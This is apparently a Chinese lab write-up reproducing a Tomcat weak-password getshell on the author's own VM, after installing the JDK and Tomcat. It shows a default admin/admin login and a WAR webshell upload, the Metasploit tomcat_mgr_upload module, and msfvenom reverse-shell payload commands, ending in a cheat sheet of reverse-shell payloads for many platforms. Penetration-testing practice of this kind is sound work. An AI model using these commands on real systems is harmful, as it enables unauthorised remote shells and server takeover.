TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>

操作流程(环境搭建-实践操作)

在linux虚拟机上安装jdk

新创建linux虚拟机

通过mobaxterm连接虚拟机


v2-1587e7fd3cf96009f8129bc34dea5cfb_b.jpg

导入tomcat安装包与jdk安装包

apache-tomcat-7.0.92.tar

jdk-8u201-linux-x64.tar.gz


v2-00aca0442fdfd7cb9be4889721d40248_b.jpg

查询环境中是否存在java

yum list installed |grep java


v2-0846ad52389d8e52b4932b3aad2fbdd5_b.jpg

创建jdk的路径 /usr/java/

mkdir /usr/java/


v2-6620a0ba154aef151e529b66735edb31_b.jpg


v2-3f21b04db8c336303df286b1a24f70f0_b.jpg

将jdk包解压

tar -zxvf jdk-8u201-linux-x64.tar.gz


v2-abbd9c34b70e41a46b9c6153fe5e2827_b.jpg


v2-7f41013d55db1e0e12d008a7761b44d5_b.jpg

将jdk 1.8.0_201移动到创建的?usr/java/下

mv jdk1.8.0_201/ /usr/java


v2-2d399a7d8af6f0ec18a7adb668670753_b.jpg

建立短链接

ln -s /usr/java/jdk1.8.0_201/ /usr/jdk


v2-b7892cbb5be621b452dec62350da8cb4_b.jpg

编辑配置文件,配置环境变量

vim /etc/profile

添加

export JAVA_HOME=/usr/java/jdk1.8.0_201

export JRE_HOME=${JAVA_HOME}/jre

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

export PATH=${JAVA_HOME}/bin:$PATH


v2-193deea6e9f347fa2c08e035ec80b38c_b.jpg

重新加载配置文件/etc/profile

source /etc/profile

也可以使用sudo shutdown -r now重启,但是客户环境的服务器一般是不允许重启的


v2-ccc5b152de0a449cf3e691924ebca27c_b.jpg

查看java版本


v2-8c083df09d1c134cc2eff33907492889_b.jpg

运行命令 javac


v2-9bee5db303e981f4d8b5cdc8bf85d48b_b.jpg

在linux虚拟机上安装tomcat

创建一个tomcat目录

mkdir /usr/tomcat


v2-9d4aa0c0b51cd088d2122950032c0ab7_b.jpg

解压tomcat安装包


v2-d53c36ed393e4057ea383e4122aff998_b.jpg


v2-527c32a19d2bc69256fd42edc8b35381_b.jpg

解压成功

将解压内容移动至 /usr/tomcat

mv apache-tomcat-7.0.92/ /usr/tomcat


v2-6a1816897866e09f705c937bee056c0f_b.jpg

生成链接以便版本升级

ln -s apache-tomcat-7.0.92 server


v2-88a0053587056cc162e613f7f5872622_b.jpg

启动tomcat

在usr/tomcat/server/bin 执行 ./startup.sh


v2-248623b25798deddebbfe59226275ab3_b.jpg


v2-e603f5aeb96052d93203cec565f4e024_b.jpg

关闭防火墙(考虑到安全因素,不可取)


v2-f13b3142b09250d9bd8923edfddc9812_b.jpg

或者编辑防火墙配置文件

vim /etc/sysconfig/iptables

添加需要的端口


v2-c9b677c4c6a17bdd1b737b47b1e33a62_b.jpg

添加的端口需要在

-A INPUT -j REJECT --reject-with icmp-host-prohibited

之上才会生效

重启防火墙服务


v2-aeb284566b348d94584f61f3484e2871_b.jpg

查看防火墙端口状态


v2-2b446a2da3651b5092abe70db236cbd8_b.jpg


访问页面


v2-35a287c27a64237be152eff6596f3bf1_b.jpg

演练开始:

cnblogs.com/bmjoker/p/9

环境搭建好了

http://192.168.0.106:8080


v2-471f7d9f5830806966f1b574042ac6fc_b.jpg


一、上传war包(马儿连接)

1、尝试弱口令默认密码登录 admin/admin


v2-f3c2c98ad80ab9a2f289928fe661f377_b.jpg


2、成功登录manager管理后台


v2-1a464a9ccb94f5f97de3dc0315c6ae11_b.jpg


3、上传war包

上传成功解析成功


v2-7d5f5ec043cbce838985e8a3922d1d10_b.jpg


4、访问war网站内容(内容解析)

192.168.0.106:8080/war/


v2-c69189d7d274ea03e0add926d7cb4885_b.jpg


5、可以执行命令(菜刀连接)


v2-513110ba2d69fe900a0fb792329ad4be_b.jpg


获取到系统的权限


v2-1fb0501fbca361be4a6960ad18727eee_b.jpg



二、MSF反弹getshell

exploit/multi/http/tomcat_mgr_upload


v2-81062a5b0f4f1f24a021dfafdcc3da57_b.jpg


执行ls


v2-56988320bddd2b7a532074ee7fcb2e40_b.jpg


还能查看 etc/passwd


v2-c710109d8f17c1faea431156ca299256_b.jpg


三、msfvenom来作一个后门反弹webshell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.144 LPORT=1111 -f elf > shell.elf



v2-e61110d9aead6114e069b6a2b87b5d6a_b.jpg


其他类型的制作的msf反弹webshell

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

执行


v2-40ee2b5a78ee743af837c2c889c59e97_b.jpg


反弹回来了


v2-0f77c67c96acbeeea8648ad16f5c032b_b.jpg



总结:

1、就是靶站搭建的时候会刚刚下载的tomcat的默认的没有manger和其他的admin的管理界面的,需要自己器调整conf/tomcat-user.xml才能进行后续的实验。


v2-cfe4e3aa90a8f776b267ce0b625b112a_b.jpg


2、就是需要手动的安装JDK8以上。

3、开始在靶机上面开启服务一直不能msf连接上,需要重启,调节Linux的net work设置,获取同一网段,才好后面的反弹shell的操作。

4、注意msf的webshell制作过程,那个lhost和lport的IP上远程监听的IP。

jianshu.com/u/bf0e38a8d(简书主页)

zhuanlan.zhihu.com/c_17(知乎主页)

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值